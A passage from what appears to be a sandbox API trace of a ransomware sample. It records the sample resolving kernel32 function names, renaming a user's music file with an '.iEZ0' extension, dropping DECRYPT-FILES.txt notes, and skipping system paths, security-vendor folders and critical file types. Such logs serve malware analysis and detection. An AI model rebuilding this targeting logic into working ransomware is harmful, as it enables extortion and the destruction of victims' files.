(in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.591] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.591] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.591] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.592] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.592] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.592] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.592] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.592] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.592] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.592] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.592] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.592] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.592] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.592] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.592] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.592] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.592] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.592] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.592] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.592] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.592] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.592] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.593] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.593] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.593] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.593] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.593] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.593] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.593] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.593] lstrlenA (lpString="DELETEATOM") returned 10 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.593] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.593] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.593] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.593] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.593] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.593] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.593] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.593] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.593] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.594] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.594] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.594] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.594] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.594] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.594] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.594] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.594] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.594] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.594] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.594] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.594] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.594] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.594] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.594] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.594] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.594] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.594] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.594] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.595] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.595] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.595] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.595] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.595] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.595] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.595] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.595] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.595] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.595] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.595] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.595] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.595] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.595] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qMEzdi4bO.wav") returned 49 [0085.595] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qMEzdi4bO.wav.iEZ0") returned 54 [0085.596] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qMEzdi4bO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qmezdi4bo.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qMEzdi4bO.wav.iEZ0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qmezdi4bo.wav.iez0"), dwFlags=0x0) returned 1 [0085.596] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.596] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.597] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.597] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4bb4040, ftCreationTime.dwHighDateTime=0x1d4cc44, ftLastAccessTime.dwLowDateTime=0xbe938800, ftLastAccessTime.dwHighDateTime=0x1d4c714, ftLastWriteTime.dwLowDateTime=0xbe938800, ftLastWriteTime.dwHighDateTime=0x1d4c714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RAZ7", cAlternateFileName="")) returned 1 [0085.597] lstrcmpW (lpString1="RAZ7", lpString2=".") returned 1 [0085.597] lstrcmpW (lpString1="RAZ7", lpString2="..") returned 1 [0085.597] lstrcatW (in: lpString1="RAZ7", lpString2="\\" | out: lpString1="RAZ7\\") returned="RAZ7\\" [0085.597] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="RAZ7\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" [0085.597] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\Program Files") returned 0x0 [0085.597] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch=":\\Windows") returned 0x0 [0085.597] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\Games\\") returned 0x0 [0085.597] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\Tor Browser\\") returned 0x0 [0085.597] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\ProgramData\\") returned 0x0 [0085.597] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0085.597] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0085.597] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0085.597] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\All Users") returned 0x0 [0085.597] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\IETldCache\\") returned 0x0 [0085.597] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\Local Settings\\") returned 0x0 [0085.597] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\AppData\\Local") returned 0x0 [0085.597] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="AhnLab") returned 0x0 [0085.597] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0085.597] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned 41 [0085.597] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.597] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\\\jkbimi8.tmp") returned 53 [0085.597] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0085.598] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned 41 [0085.598] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0085.598] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\\\DECRYPT-FILES.txt") returned 59 [0085.598] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0085.598] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0085.599] CloseHandle (hObject=0x414) returned 1 [0085.599] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned 41 [0085.599] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\*" [0085.599] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4bb4040, ftCreationTime.dwHighDateTime=0x1d4cc44, ftLastAccessTime.dwLowDateTime=0xaf37e300, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf37e300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0085.599] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.599] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4bb4040, ftCreationTime.dwHighDateTime=0x1d4cc44, ftLastAccessTime.dwLowDateTime=0xaf37e300, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf37e300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.599] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.599] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.599] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf37e300, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf37e300, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf37e300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0085.599] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0085.600] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd36aebd0, ftCreationTime.dwHighDateTime=0x1d4cded, ftLastAccessTime.dwLowDateTime=0x6fa0b0b0, ftLastAccessTime.dwHighDateTime=0x1d4d493, ftLastWriteTime.dwLowDateTime=0x6fa0b0b0, ftLastWriteTime.dwHighDateTime=0x1d4d493, nFileSizeHigh=0x0, nFileSizeLow=0xb69a, dwReserved0=0x0, dwReserved1=0x0, cFileName="eT6JvIsf5PzgpcQ4Oo.mp3", cAlternateFileName="ET6JVI~1.MP3")) returned 1 [0085.600] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3", lpString2="DECRYPT-FILES.txt") returned 1 [0085.600] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3", lpString2="autorun.inf") returned 1 [0085.600] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3", lpString2="boot.ini") returned 1 [0085.600] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3", lpString2="desktop.ini") returned 1 [0085.600] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3", lpString2="ntuser.dat") returned -1 [0085.600] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3", lpString2="iconcache.db") returned -1 [0085.600] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3", lpString2="bootsect.bak") returned 1 [0085.600] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3", lpString2="ntuser.dat.log") returned -1 [0085.600] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3", lpString2="thumbs.db") returned -1 [0085.600] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3", lpString2="Bootfont.bin") returned 1 [0085.600] lstrlenW (lpString="eT6JvIsf5PzgpcQ4Oo.mp3") returned 22 [0085.600] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0085.600] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0085.600] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0085.600] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0085.600] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned 41 [0085.600] lstrlenW (lpString="eT6JvIsf5PzgpcQ4Oo.mp3") returned 22 [0085.600] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" [0085.600] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpString2="eT6JvIsf5PzgpcQ4Oo.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\eT6JvIsf5PzgpcQ4Oo.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\eT6JvIsf5PzgpcQ4Oo.mp3" [0085.600] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.600] CreateFileW 